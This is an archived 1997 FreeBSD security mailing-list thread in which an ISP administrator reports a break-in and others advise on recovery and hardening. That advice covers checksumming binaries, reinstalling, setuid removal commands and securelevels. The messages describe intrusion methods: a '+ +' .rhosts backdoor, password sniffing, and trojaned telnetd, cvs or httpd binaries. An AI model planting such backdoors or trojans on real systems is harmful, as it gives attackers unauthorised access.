charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote: | =)My suggestion to you would be to get a clean source tree, recompile everything | =)and install tripwire. | | I'll do that as soon as the machine comes back up. I heard that | suid programs can be a problem too but which ones are required to be suid? su really should be setuid. Everything else is debatable. My advice is to turn off all setuid bits except those you know you need (possibly w, who, ps, ping, at, passwd) find / -xdev -perm -4000 -ok chmod u-s {} \; find /usr -xdev -perm -4000 -ok chmod u-s {} \; find / -xdev -perm -2000 -ok chmod g-s {} \; find /usr -xdev -perm -2000 -ok chmod g-s {} \; # The semicolons are part of the line Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Jul 28 13:46:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA01616 for security-outgoing; Mon, 28 Jul 1997 13:46:34 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA01606 for ; Mon, 28 Jul 1997 13:46:27 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id QAA04126; Mon, 28 Jul 1997 16:46:01 -0400 (EDT) Date: Mon, 28 Jul 1997 16:46:01 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Robert Watson wrote: > > Yep, sniffing would work but can they actually sniff outside of > the network? Well, once you have one host, you have all the hosts on the same ethernet segment. Typically, though, problems with sniffing occur on college dorm networks, which run large numbers of less-well-managed Linux/etc hosts. This may be an increasing problem on Cable-modem networks, which I understand work something like Ethernet, in that they are broadcast networks for a local segment. Also, who is to say that occasionally routers or ISP machines don't get broken into, and sniffing occurs? Any of your users could be logging in from an untrusted network, so in essense you are relying on that network to be secure as well as your own. > =)Your best hope at this point is to shut down the system, boot on a floppy > =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries > =)and check for changes. If you're running STABLE, your best bet may be to > =)sup down differences, but to reinstall the binaries necessary to support > =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. > =)If he's made enough changes to zap syslog, netstat, login-stuff, I > =)wouldn't trust any other tools on the system currently. > > Not even a rebuild of -current after cvs? Well, the problem is, I could easily replace cvs with a script that does cvs, then installs my security hole again. :) Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 13:55:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA02185 for security-outgoing; Mon, 28 Jul 1997 13:55:35 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA02179 for ; Mon, 28 Jul 1997 13:55:31 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id QAA04144; Mon, 28 Jul 1997 16:55:19 -0400 (EDT) Date: Mon, 28 Jul 1997 16:55:19 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: Vincent Poy , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707282004.QAA07078@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Adam Shostack wrote: > Vincent Poy wrote: > > su really should be setuid. Everything else is debatable. My > advice is to turn off all setuid bits except those you know you need > (possibly w, who, ps, ping, at, passwd) > > find / -xdev -perm -4000 -ok chmod u-s {} \; > find /usr -xdev -perm -4000 -ok chmod u-s {} \; > find / -xdev -perm -2000 -ok chmod g-s {} \; > find /usr -xdev -perm -2000 -ok chmod g-s {} \; > # The semicolons are part of the line Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) require root access to delivery to local mailboxes; crontab related stuff, terminal locking, some kerberos commands, local XWindows servers, and su all rely on suid. What type of secured environment are you hoping to create? If root access is only to be used from the console, and shared functions like xwindows/mailstuff/user crontab aren't needed, you can probably just disable all the suid-root programs, or suid-anything programs. Look also at the sgid programs that scan kmem. Ideally, you'd also put the system in a higher secure level, and mount all partitions non-suid, as long as login kept working :). Does login require suid, or does gettytab run it as root anyway? Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 14:04:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA02728 for security-outgoing; Mon, 28 Jul 1997 14:04:01 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA02710 for ; Mon, 28 Jul 1997 14:03:57 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id PAA07719; Mon, 28 Jul 1997 15:00:57 -0600 (MDT) Date: Mon, 28 Jul 1997 15:00:57 -0600 (MDT) Message-Id: <199707282100.PAA07719@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Jonathan A. Zdziarski" Cc: Robert Watson , Vincent Poy , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: References: X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There IS one common hole I've seen apache and stronghold have, and that is > that some people like to leave their sessiond or httpd files owned by > 'nobody'. This allows somebody running CGI on that system to replace > those binaries with their own, hacked binaries (since the scripts are > usually owned as nobody), and the next time httpd starts, they can make it > write a root shell, or just about anything along those lines. If it's running as 'nobody', it can't create a root shell. It can create a 'nobody' shell though... Nate From owner-freebsd-security Mon Jul 28 14:15:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03470 for security-outgoing; Mon, 28 Jul 1997 14:15:13 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA03465 for ; Mon, 28 Jul 1997 14:15:09 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id RAA26643; Mon, 28 Jul 1997 17:14:39 -0400 (EDT) Date: Mon, 28 Jul 1997 17:14:38 -0400 (EDT) From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > I'll do that as soon as the machine comes back up. I heard that > suid programs can be a problem too but which ones are required to be suid? As a general rule I set all suid/sgid system executeables schg and run with securelevel set to 1 or 2. Getting rid of any unecessary suid/sgid programs would be good too. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 14:18:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03641 for security-outgoing; Mon, 28 Jul 1997 14:18:25 -0700 (PDT) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.7]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id OAA03636 for ; Mon, 28 Jul 1997 14:18:22 -0700 (PDT) Received: (qmail 29609 invoked from network); 28 Jul 1997 21:18:15 -0000 Received: from geekgirl.mediacity.com (HELO geekgirl) (208.138.36.24) by mail001.mediacity.com with SMTP; 28 Jul 1997 21:18:15 -0000 Date: Mon, 28 Jul 1997 02:22:24 -0800 From: "Nicole H." Subject: Re: security hole in FreeBSD To: Robert Watson , Vincent Poy Cc: "[Mario1-]" , JbHunt , security@FreeBSD.ORG, Tomasz Dudziak X-Mailer: Z-Mail Pro 6.1 (Win32 - 021297), NetManage Inc. X-Face: Dy;P!H@)Go.{^Epw&,}@q4ReQ3iOqFrASM63QjFsK/'XnOO67}+{szQ|oo]]`]/.r,g5lx; w+F^YYL4j Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a machine running in promiscuous mode? Thanks Nicole > On Mon, 28 Jul 1997, Robert Watson wrote: > > =)> =)I'd be tempted to look in all the normal places -- sendmail, etc. What > =)> =)daemons were running on the machine? Any web server processes? Also, I'd > =)> =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is > =)> =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be > =)> =)extremely unhappy if we already know (s)he is messing with DNS entries. > =)> > =)> sendmail is running as well as apache httpd... ftpd, telnetd, and > =)> ircd. No NIS. ALl I know was he managed to changed everyone's .rhosts > =)> file when it doesn't exist originally and the contents just had: > =)> + + > =)> in it. > =) > =)This guy sounds like either he has good tools, or good experience. For > =)safety's sake, I'd guess the latter. All he needed was one sniffed > =)password to get on the system, and then you may be stuck with known holes > =)in application software. Most of the security problems I've seen have > =)started with a sniffed password, but this comes from dormitory experience > =):). > > Yep, sniffing would work but can they actually sniff outside of > the network? > > =)Your best hope at this point is to shut down the system, boot on a floppy > =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries > =)and check for changes. If you're running STABLE, your best bet may be to > =)sup down differences, but to reinstall the binaries necessary to support > =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. > =)If he's made enough changes to zap syslog, netstat, login-stuff, I > =)wouldn't trust any other tools on the system currently. > > Not even a rebuild of -current after cvs? > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > ---------------End of Original Message----------------- nicole@mediacity.com |\ __ /| (`\ http://www.mediacity.com Nicole Harrington | o_o |__ ) ) Phone: 415-237-1464 // \\ Pager: 415-301-2482 Systems Administrator ------------------------(((---(((------------------------------------- ******* * ***** What do you mean Spelling Errors? * * * My Modem is Error Correcting! * CAUTION: I'm no doctor, I only tell computers what to do. Nothing in this document should be construed as medical advice. My opinions are subject to the availability of information. I learn new things each day, and so may change my opinions. Courtesy is owed. Respect is earned. Love is given. -- ----------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 14:31:22 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA04521 for security-outgoing; Mon, 28 Jul 1997 14:31:22 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA04513 for ; Mon, 28 Jul 1997 14:31:15 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.8.4/8.8.4) with ESMTP id XAA02513 for ; Mon, 28 Jul 1997 23:31:15 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.8.6/brasil-1.2) with UUCP id XAA08619 for security@FreeBSD.ORG; Mon, 28 Jul 1997 23:30:49 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.6/keltia-uucp-2.9) id XAA01241; Mon, 28 Jul 1997 23:07:58 +0200 (CEST) Message-ID: <19970728230758.23621@keltia.freenix.fr> Date: Mon, 28 Jul 1997 23:07:58 +0200 From: Ollivier Robert To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD References: <19970728171633.10794@keltia.freenix.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.76 In-Reply-To: ; from Vincent Poy on Mon, Jul 28, 1997 at 12:49:00PM -0700 X-Operating-System: FreeBSD 3.0-CURRENT ctm#3481 AMD-K6 MMX @ 208 MHz Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk According to Vincent Poy: > Nope, when I added perl5 yesterday from the ports tree, I deleted > the perl5.003 and sperl5.003 that was there after it got updated to > perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way? Not if it is CURRENT from later than May. No hole that we know of anyway. > True but netstat wasn't working anymore after we kicked him off > the first time and rejected all packets from his ip # when he came back > on. LSOF is your friend in case you haven't compiled it yet. -- Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997 From owner-freebsd-security Mon Jul 28 14:42:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA05192 for security-outgoing; Mon, 28 Jul 1997 14:42:53 -0700 (PDT) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA05185 for ; Mon, 28 Jul 1997 14:42:51 -0700 (PDT) Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Kitten.mcs.com (8.8.5/8.8.2) with ESMTP id QAA23991; Mon, 28 Jul 1997 16:42:28 -0500 (CDT) Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.5/8.8.2) id QAA16687; Mon, 28 Jul 1997 16:42:28 -0500 (CDT) Message-ID: <19970728164228.19622@Jupiter.Mcs.Net> Date: Mon, 28 Jul 1997 16:42:28 -0500 From: Karl Denninger To: Robert Watson Cc: Adam Shostack , Vincent Poy , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD References: <199707282004.QAA07078@homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.64 In-Reply-To: ; from Robert Watson on Mon, Jul 28, 1997 at 04:55:19PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, Jul 28, 1997 at 04:55:19PM -0400, Robert Watson wrote: > On Mon, 28 Jul 1997, Adam Shostack wrote: > > > Vincent Poy wrote: > > > > su really should be setuid. Everything else is debatable. My > > advice is to turn off all setuid bits except those you know you need > > (possibly w, who, ps, ping, at, passwd) > > > > find / -xdev -perm -4000 -ok chmod u-s {} \; > > find /usr -xdev -perm -4000 -ok chmod u-s {} \; > > find / -xdev -perm -2000 -ok chmod g-s {} \; > > find /usr -xdev -perm -2000 -ok chmod g-s {} \; > > # The semicolons are part of the line > > Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) > require root access to delivery to local mailboxes; crontab related stuff, > terminal locking, some kerberos commands, local XWindows servers, and su > all rely on suid. > > What type of secured environment are you hoping to create? If root access > is only to be used from the console, and shared functions like > xwindows/mailstuff/user crontab aren't needed, you can probably just > disable all the suid-root programs, or suid-anything programs. Look also > at the sgid programs that scan kmem. Ideally, you'd also put the system > in a higher secure level, and mount all partitions non-suid, as long as > login kept working :). > > Does login require suid, or does gettytab run it as root anyway? > > Robert N Watson If you take the SUID off login it works fine, PROVIDED you don't try to use it to "re-login" (a rather common thing for Berzerkelyoids to do). -- -- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service | 99 Analog numbers, 77 ISDN, http://www.mcs.net/ Voice: [+1 312 803-MCS1 x219]| NOW Serving 56kbps DIGITAL on our analog lines! Fax: [+1 312 803-4929] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal From owner-freebsd-security Mon Jul 28 14:44:44 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA05318 for security-outgoing; Mon, 28 Jul 1997 14:44:44 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA05295 for ; Mon, 28 Jul 1997 14:44:40 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id OAA06194; Mon, 28 Jul 1997 14:44:15 -0700 (PDT) Date: Mon, 28 Jul 1997 14:44:14 -0700 (PDT) From: Vincent Poy To: "[Mario1-]" cc: JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, [Mario1-] wrote: =)On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =) =): There IS one common hole I've seen apache and stronghold have, and that is =): that some people like to leave their sessiond or httpd files owned by =): 'nobody'. This allows somebody running CGI on that system to replace =): those binaries with their own, hacked binaries (since the scripts are =): usually owned as nobody), and the next time httpd starts, they can make it =): write a root shell, or just about anything along those lines. =) =)Now THIS is interesting. I was thinking about this a little while ago. =)Didn't it seem like 'nobody' had an awful lot of processes running =)last night? Yes, it did but they were all httpd and I understand apache httpd has fixed this security hole a long time ago since we are using the new version of apache. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:02:14 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA06502 for security-outgoing; Mon, 28 Jul 1997 15:02:14 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA06496 for ; Mon, 28 Jul 1997 15:02:10 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06292; Mon, 28 Jul 1997 15:01:53 -0700 (PDT) Date: Mon, 28 Jul 1997 15:01:53 -0700 (PDT) From: Vincent Poy To: Adam Shostack cc: langfod@dihelix.com, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707282004.QAA07078@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Adam Shostack wrote: =)Vincent Poy wrote: =)| =)My suggestion to you would be to get a clean source tree, recompile everything =)| =)and install tripwire. =)| =)| I'll do that as soon as the machine comes back up. I heard that =)| suid programs can be a problem too but which ones are required to be suid? =) =) =) su really should be setuid. Everything else is debatable. My =)advice is to turn off all setuid bits except those you know you need =)(possibly w, who, ps, ping, at, passwd) Isn't traceroute supposed to be suid also? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:07:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA06756 for security-outgoing; Mon, 28 Jul 1997 15:07:33 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA06749 for ; Mon, 28 Jul 1997 15:07:28 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06325; Mon, 28 Jul 1997 15:07:10 -0700 (PDT) Date: Mon, 28 Jul 1997 15:07:10 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =) =)> On Mon, 28 Jul 1997, Robert Watson wrote: =)> =)> Yep, sniffing would work but can they actually sniff outside of =)> the network? =) =)Well, once you have one host, you have all the hosts on the same ethernet =)segment. Typically, though, problems with sniffing occur on college dorm =)networks, which run large numbers of less-well-managed Linux/etc hosts. =)This may be an increasing problem on Cable-modem networks, which I =)understand work something like Ethernet, in that they are broadcast =)networks for a local segment. Also, who is to say that occasionally =)routers or ISP machines don't get broken into, and sniffing occurs? Any =)of your users could be logging in from an untrusted network, so in essense =)you are relying on that network to be secure as well as your own. That would be true but it seems the attacker can only get into the FreeBSD-current machines and not the other ones running 2.1.7.1R or 2.2.2R. Ofcourse the -current machines are the ones that really run the ISP. The T1 line directly terminates in the house so no one local would packet sniff it and would befoolish to do so since they can just boot in single user mode. Ofcourse routers can be broken into or even our backbone provider CRL's. We're running a FreeBSD 2.1.7R based router with a ET card and the hacker never made it into the machine. =)> =)Your best hope at this point is to shut down the system, boot on a floppy =)> =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries =)> =)and check for changes. If you're running STABLE, your best bet may be to =)> =)sup down differences, but to reinstall the binaries necessary to support =)> =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. =)> =)If he's made enough changes to zap syslog, netstat, login-stuff, I =)> =)wouldn't trust any other tools on the system currently. =)> =)> Not even a rebuild of -current after cvs? =) =)Well, the problem is, I could easily replace cvs with a script that does =)cvs, then installs my security hole again. :) True but if it sups from hub.FreeBSD.ORG, how would you forge it? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:10:45 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA06985 for security-outgoing; Mon, 28 Jul 1997 15:10:45 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA06977 for ; Mon, 28 Jul 1997 15:10:40 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id PAA04912; Mon, 28 Jul 1997 15:10:36 -0700 (PDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 03:19:55 PDT." Date: Mon, 28 Jul 1997 15:10:35 -0700 Message-ID: <4908.870127835@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I think you are describing the symptom, not the problem. This looks very much like a system which was broken into and then trojan'd to allow easier, more invisible access. How do you know, for example, that your telnetd is really telnetd? Did you verify that? ;) Also, I'd check that inetd.conf file again and make _really sure_ you haven't left remote shell access enabled - a lot of people miss that because it's not explicitly labelled "rlogin" like they might expect. Jordan From owner-freebsd-security Mon Jul 28 15:26:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA07922 for security-outgoing; Mon, 28 Jul 1997 15:26:30 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA07917 for ; Mon, 28 Jul 1997 15:26:27 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06426; Mon, 28 Jul 1997 15:26:13 -0700 (PDT) Date: Mon, 28 Jul 1997 15:26:12 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Adam Shostack , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) =)require root access to delivery to local mailboxes; crontab related stuff, =)terminal locking, some kerberos commands, local XWindows servers, and su =)all rely on suid. That's what I thought. I think even fingerd needs suid. =)What type of secured environment are you hoping to create? If root access =)is only to be used from the console, and shared functions like =)xwindows/mailstuff/user crontab aren't needed, you can probably just =)disable all the suid-root programs, or suid-anything programs. Look also =)at the sgid programs that scan kmem. Ideally, you'd also put the system =)in a higher secure level, and mount all partitions non-suid, as long as =)login kept working :). Hmmm, but what about root access by using su? =)Does login require suid, or does gettytab run it as root anyway? I think it does. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:28:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08022 for security-outgoing; Mon, 28 Jul 1997 15:28:48 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08017 for ; Mon, 28 Jul 1997 15:28:44 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06438; Mon, 28 Jul 1997 15:28:38 -0700 (PDT) Date: Mon, 28 Jul 1997 15:28:38 -0700 (PDT) From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> I'll do that as soon as the machine comes back up. I heard that =)> suid programs can be a problem too but which ones are required to be suid? =) =)As a general rule I set all suid/sgid system executeables schg and run =)with securelevel set to 1 or 2. =) =)Getting rid of any unecessary suid/sgid programs would be good too. That wouldn't do any good if the user can chflags noschg on the binaries you have schg on. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:30:45 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08160 for security-outgoing; Mon, 28 Jul 1997 15:30:45 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08153 for ; Mon, 28 Jul 1997 15:30:42 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id SAA27550; Mon, 28 Jul 1997 18:30:29 -0400 (EDT) Date: Mon, 28 Jul 1997 18:30:28 -0400 (EDT) From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, 